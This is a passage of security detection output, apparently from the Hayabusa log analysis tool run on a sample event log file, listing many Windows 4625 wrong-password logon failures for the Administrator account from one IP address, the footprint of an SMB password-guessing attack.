192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.744 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ysg903vYFhQHYvFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IySarHtsTvwSP56H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.828 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnUy8tbCIAVnmhDg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.863 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bfBtc4MnMtPG6MpC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37b8MGIHY8QwXf9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
eDuaWikplDmJNmIE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:38.989 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kSSoAYJILHCPI7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.023 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L9ikrtTGcZYU1556 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.064 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ypyd6SagvUXQHhtZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.100 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWS37lIJ3Q6ghgMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H211KmFImpBRwTGW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.193 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 64tO5iBehXQcNc49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xvxDngRj3j5TAwST | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.281 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O8VYRjMnxDgUTWYf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.331 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhWphTesbUf0hwi1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.385 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MO8VRRVANxIkDzEX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.429 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ziSXANiDAf7LRFz5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.527 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: g0CvYYtyEcU2riBX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tPg2LKgWMeM0Oqo0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.604 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbzL9T2d4RdeCz4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.653 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PeEfbWpoipfYtOKv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.685 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RKJW1vSrIAbRTzyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.730 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aU4G8NBru22Vc4Cl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: sacBcqxV97FUihrd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.821 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 41Ms0lEMeT0jYxYj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.859 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkQWVEHGM1NxowR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qKqRY7L2IQRoU57 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:39.954 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eMIkvwbvqc9V6CFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.001 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PehzjCnK42ZPUE7e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.049 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fqw2GWiYfO0kU83 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.094 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFPJJNCFdPJl4igl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zc6CrAr7YoozKB6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHXminAIeV4ZJIK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06YmUCHNZqbaZMdZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.282 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fYoENCtP2uPy9xNh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:40.333 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TRJRuXJTTH1afAfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.381 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpnkzTlc3Uvj3hpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.425 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIuD8haFzR8P87rL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.475 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL1IreMAiE564NXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.520 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMUiCaMGBC46MnPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.560 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MOSWbwooyb60LExG | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSDNF7s3vbtkZIOz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.641 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JBMk0qOV6237XtK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.694 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j41R1U1tYPvApCkZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.737 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcPkVZSeg5VwChW8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.778 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDLxt5gaFDTKsiVl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94JvBKdxJkawQQMT | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KgBMk00K3iC1GQem | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XdGOj9Ybm6bcCo3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.950 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: by6F4YKorxhp5ahn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:40.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1G6ZOgOaV6luDQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.046 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qqSwNfvpPLQd6ZH1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.087 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
mxtJJj54xSzHibHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.129 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Y3yznfdaZ7dtwDO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esllFn4asbLxwkBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.202 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Pr0cgd6cF5ukhZ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.249 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pS2fabTrbl6rZ1NB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.305 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkylDDmUyuT57HdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.337 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: Aqs8rSvuLAQuhfDp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KI07KTgBJc4kBSKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Re3n3nJ8EEhRRT3G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BzspAC3z1csEn0Ve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.505 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tpkb6bf42SLUst3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.546 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1F5d2wn60OgAExW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: bhPNRHWhTyonDPuA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.642 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zEsnyWpUuHVBo6et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.685 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I2FwaWy9TALkk9eU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.778 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fuikeQsxlOUVifVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZWdsRJp9fHypPI1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0j0IBX2eZnx99n9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.909 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: YIZ5Knxg0xr0WmDb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.953 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wuej3f7mEoWmd4SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.998 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0LcCi06ilIhFPwb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.041 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWsCGgoFmH06rRf4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP47JjNKqtYIZPsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.140 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mNlWZ9o0xf7bl2d0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.186 
